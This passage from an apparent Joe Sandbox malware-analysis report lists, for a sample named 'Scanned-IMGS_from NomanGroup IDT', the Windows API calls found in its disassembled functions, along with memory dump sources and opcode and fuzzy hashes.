                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                • String ID:
                                                                                • API String ID: 1592001646-0
                                                                                • Opcode ID: 32eecaadf14215df19102c0ed1dfbb261641bf60d1780ffd9a0777536df2fc90
                                                                                • Instruction ID: 2bf09c66886cda5952258cb190e163d447c5bce1d63a72f8daf649dc5ab1107d
                                                                                • Opcode Fuzzy Hash: 32eecaadf14215df19102c0ed1dfbb261641bf60d1780ffd9a0777536df2fc90
                                                                                • Instruction Fuzzy Hash: 4021AF31E40108EFDF10DFA4C995BEFB7B8EF45344F48445AE441AB261E738AA15CBA4
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004E280A
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E2824
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E2832
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004E2840
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: 080e693e1c80764d6f2c00212819a83498bf35ef35726613cba74f9da0dad628
                                                                                • Instruction ID: 59cfdebf3af08a6248b45ab045d5e73b82cd81f6bb9da0c23319769485bf1d58
                                                                                • Opcode Fuzzy Hash: 080e693e1c80764d6f2c00212819a83498bf35ef35726613cba74f9da0dad628
                                                                                • Instruction Fuzzy Hash: E9210231204190AFD7149B26C981F6A7799BF45329F14821EF8168B2D2C7B9EC42C798
                                                                                APIs
                                                                                  • Part of subcall function 004B8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?), ref: 004B8D8C
                                                                                  • Part of subcall function 004B8D7D: lstrcpyW.KERNEL32(00000000,?,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B8DB2
                                                                                  • Part of subcall function 004B8D7D: lstrcmpiW.KERNEL32(00000000,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?), ref: 004B8DE3
                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7923
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7949
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7984
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 17d359aeacdb3edabe4cbcb788363e7727ef1b01f91fea53fb1d3e03a6b6f24e
                                                                                • Instruction ID: a1cea070d120d29135133ffd011a5952d4b8ec257edfd5ae9b5b557048d0e12d
                                                                                • Opcode Fuzzy Hash: 17d359aeacdb3edabe4cbcb788363e7727ef1b01f91fea53fb1d3e03a6b6f24e
                                                                                • Instruction Fuzzy Hash: 5611037A200242ABDB159F35D884DBB77A9FF85354B00402FF842CB3A5EB359812C7A9
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E7D0B
                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 004E7D2A
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004E7D42
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004CB7AD,00000000), ref: 004E7D6B
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID:
                                                                                • API String ID: 847901565-0
                                                                                • Opcode ID: d5091671c71d20b66ebd5defcf4f447c423ef3408a23878de1d561d72c846b03
                                                                                • Instruction ID: cc4f4b426c77fdf6e4a2c8374397f8e9c5642f206487057dd91f548b5ff6cef5
                                                                                • Opcode Fuzzy Hash: d5091671c71d20b66ebd5defcf4f447c423ef3408a23878de1d561d72c846b03
                                                                                • Instruction Fuzzy Hash: 0011AC312046A4AFCB108F29CC44EB73BA8AF46371B254725F839CB2E0E7349D52DB48
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 004E56BB
                                                                                • _wcslen.LIBCMT ref: 004E56CD
                                                                                • _wcslen.LIBCMT ref: 004E56D8
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004E5816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend_wcslen
                                                                                • String ID:
                                                                                • API String ID: 455545452-0
                                                                                • Opcode ID: 320473dc93ead814340276fb20d7edbfa693ee7977cfbf72c7c457bd25007911
                                                                                • Instruction ID: a78b98e8cca47664997c1eaeaa9f279dd8106963448078d3fedc0c8c4769bae7
                                                                                • Opcode Fuzzy Hash: 320473dc93ead814340276fb20d7edbfa693ee7977cfbf72c7c457bd25007911
                                                                                • Instruction Fuzzy Hash: BB11E47160068996DB20DF738CC1AEF376CEF1136AF10402BF909D6182E7788981CB69
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fc298c8f3c5b7a32ce733825582c520323c6e8b75342094167b6f66a6bcf344
                                                                                • Instruction ID: cf20ed82b7cc58e3cdabcf21f8628a518aa8b44bd59a7b96e22988f4d951ce20
                                                                                • Opcode Fuzzy Hash: 0fc298c8f3c5b7a32ce733825582c520323c6e8b75342094167b6f66a6bcf344
                                                                                • Instruction Fuzzy Hash: 2301A7F22056167EF61136796CC0F2F669CDF413B8B310F2BF521512E2DB68AC025368
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004B1A47
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A59
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A6F
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 1851b105f1d5ae9eed09751e993ad4dc273d901bac0b452b99db3a141348027f
                                                                                • Instruction ID: 4b8717ae50172eea31565bd144b120316c02bf9c87f22a5d259deaaf300c73ca
                                                                                • Opcode Fuzzy Hash: 1851b105f1d5ae9eed09751e993ad4dc273d901bac0b452b99db3a141348027f
                                                                                • Instruction Fuzzy Hash: A3112E35901219FFDB109BA5C985FDDBB78EB08750F200092E500B7290D6716E51DB94
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004BE1FD
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004BE230
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004BE246
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004BE24D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: bd7381f89b6b44161dc8d9a742a2e4f7897e2c454c98ecc519d1e0e1f546fc27
                                                                                • Instruction ID: 97ed85c0328d63fa6665508a56f7fda75f4418c74159818cec675aaf62d1993a
                                                                                • Opcode Fuzzy Hash: bd7381f89b6b44161dc8d9a742a2e4f7897e2c454c98ecc519d1e0e1f546fc27
                                                                                • Instruction Fuzzy Hash: 91114872D04244BFC710DBA89C85ADF7FAD9F91310F10466AF825E3281C274CD0587B8
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,?,0047CFF9,00000000,00000004,00000000), ref: 0047D218
                                                                                • GetLastError.KERNEL32 ref: 0047D224
                                                                                • __dosmaperr.LIBCMT ref: 0047D22B
                                                                                • ResumeThread.KERNEL32(00000000), ref: 0047D249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 173952441-0
                                                                                • Opcode ID: 569851549bc1e13561f97ec24ada887cc60aa593136bb05be1d79a1869c72188
                                                                                • Instruction ID: ee5298803dec51fd23bf9caa63b40e46c81c402a1c0cd74933a10c39bc6f38bf
                                                                                • Opcode Fuzzy Hash: 569851549bc1e13561f97ec24ada887cc60aa593136bb05be1d79a1869c72188
                                                                                • Instruction Fuzzy Hash: 86010436C142047BC7105BA6DC45BEB7A78DF81334F20826AF828961D2CB75890286A9
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
                                                                                • GetStockObject.GDI32(00000011), ref: 00456060
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: 9f8eea33ecfb911185c22eb3281dd1ea5984e9edd02daf0aa2ec20e9e025132c
                                                                                • Instruction ID: 360131ae62e2d063fb6da4a791987e65d0f33279270cfab42ce3222070c1cf5b
                                                                                • Opcode Fuzzy Hash: 9f8eea33ecfb911185c22eb3281dd1ea5984e9edd02daf0aa2ec20e9e025132c
                                                                                • Instruction Fuzzy Hash: B711E172101548BFEF128FA4CC84EEBBB69EF08765F010212FE0446151C7369C61DBA4
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00473B56
                                                                                  • Part of subcall function 00473AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00473AD2
                                                                                  • Part of subcall function 00473AA3: ___AdjustPointer.LIBCMT ref: 00473AED
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00473B6B
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00473B7C
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00473BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction ID: e0574aa8a036dac22fde9080fcec40b867265ff2d6fa46750e12262661ebdf6e
                                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction Fuzzy Hash: D5014032100148BBDF115E96CC46DEB3F6DEF88759F04801AFE5C66121C73AE961EBA5
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004513C6,00000000,00000000,?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue), ref: 004830A5
                                                                                • GetLastError.KERNEL32(?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue,004F2290,FlsSetValue,00000000,00000364,?,00482E46), ref: 004830B1
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue,004F2290,FlsSetValue,00000000), ref: 004830BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: a8f850bc5ebc772b43a96bff6918faf0979db1e1f9189f23af52bcefe77bde42
                                                                                • Instruction ID: 543792cef7bdbe3c9d1f09807dcdf2502aa9d7399a163f086fbc3419a4b118dd
                                                                                • Opcode Fuzzy Hash: a8f850bc5ebc772b43a96bff6918faf0979db1e1f9189f23af52bcefe77bde42
                                                                                • Instruction Fuzzy Hash: 4301D832742222ABC7315EB99C8496B77989F06F62B100A21F905D7245C725D902C7E8
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004B747F
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004B7497
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004B74AC
                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004B74CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: 960c66e8970f2333e25090e4e93be5df6cbfaf6f3ae0e3c675dd85d9e1e2c5cf
                                                                                • Instruction ID: dbdca9c7881d55e3aee1d9ebebd17cae65b5ea044d0d66b431f499aa24f286ba
                                                                                • Opcode Fuzzy Hash: 960c66e8970f2333e25090e4e93be5df6cbfaf6f3ae0e3c675dd85d9e1e2c5cf
                                                                                • Instruction Fuzzy Hash: 3011C4B1205314AFE7208F14DD48FE27FFCEB40B01F10896AE656DA192D774E905DBA5
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0C4
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0E9
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0F3
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB126
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                • Opcode ID: d9958f14e8f1058ec96f5bc4c4041f2ea633ba58ebbcc768e7e679d9fc5cc2f5
                                                                                • Instruction ID: 2fb12fdd3dbdfe98d3ccbfa362a86e14c4e0554b3f9b163ecfcaee952da24e91
                                                                                • Opcode Fuzzy Hash: d9958f14e8f1058ec96f5bc4c4041f2ea633ba58ebbcc768e7e679d9fc5cc2f5
                                                                                • Instruction Fuzzy Hash: D1116131C0151CE7CF10AFE9D9986FEBB78FF0A751F104096D941B6241CBB45551CBA9
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B2DC5
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004B2DD6
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004B2DDD
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004B2DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: f2fbab0f59a5141b2cfa3d5b38de67a537a3707c284c301160e8c2cf3d05b9ad
                                                                                • Instruction ID: 1e80ceb743985be7716bd6be0c86010ef8f282316ff1a7d2b37f6897455658f1
                                                                                • Opcode Fuzzy Hash: f2fbab0f59a5141b2cfa3d5b38de67a537a3707c284c301160e8c2cf3d05b9ad
                                                                                • Instruction Fuzzy Hash: B8E09272141224BBDB201B729C8DFEB7E6CEF42BA1F00042AF105D50819AE4C842D6B5
                                                                                APIs
                                                                                  • Part of subcall function 00469639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696A2
                                                                                  • Part of subcall function 00469639: BeginPath.GDI32(?), ref: 004696B9
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696E2
                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004E8887
                                                                                • LineTo.GDI32(?,?,?), ref: 004E8894
                                                                                • EndPath.GDI32(?), ref: 004E88A4
                                                                                • StrokePath.GDI32(?), ref: 004E88B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 378ef76bc7d256528b2a207eda0ae94d7c2be78d724bcc70783f1669b281069c
                                                                                • Instruction ID: ee21b07fa9613a2a3193b12e18644cfdf648be6ed4006721b583dba1a462986d
                                                                                • Opcode Fuzzy Hash: 378ef76bc7d256528b2a207eda0ae94d7c2be78d724bcc70783f1669b281069c
                                                                                • Instruction Fuzzy Hash: 80F09A36001298FADF122F94AC49FCA3B19AF16310F008011FE01690E2C7B81552DFAD
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 004698CC
                                                                                • SetTextColor.GDI32(?,?), ref: 004698D6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004698E9
                                                                                • GetStockObject.GDI32(00000005), ref: 004698F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
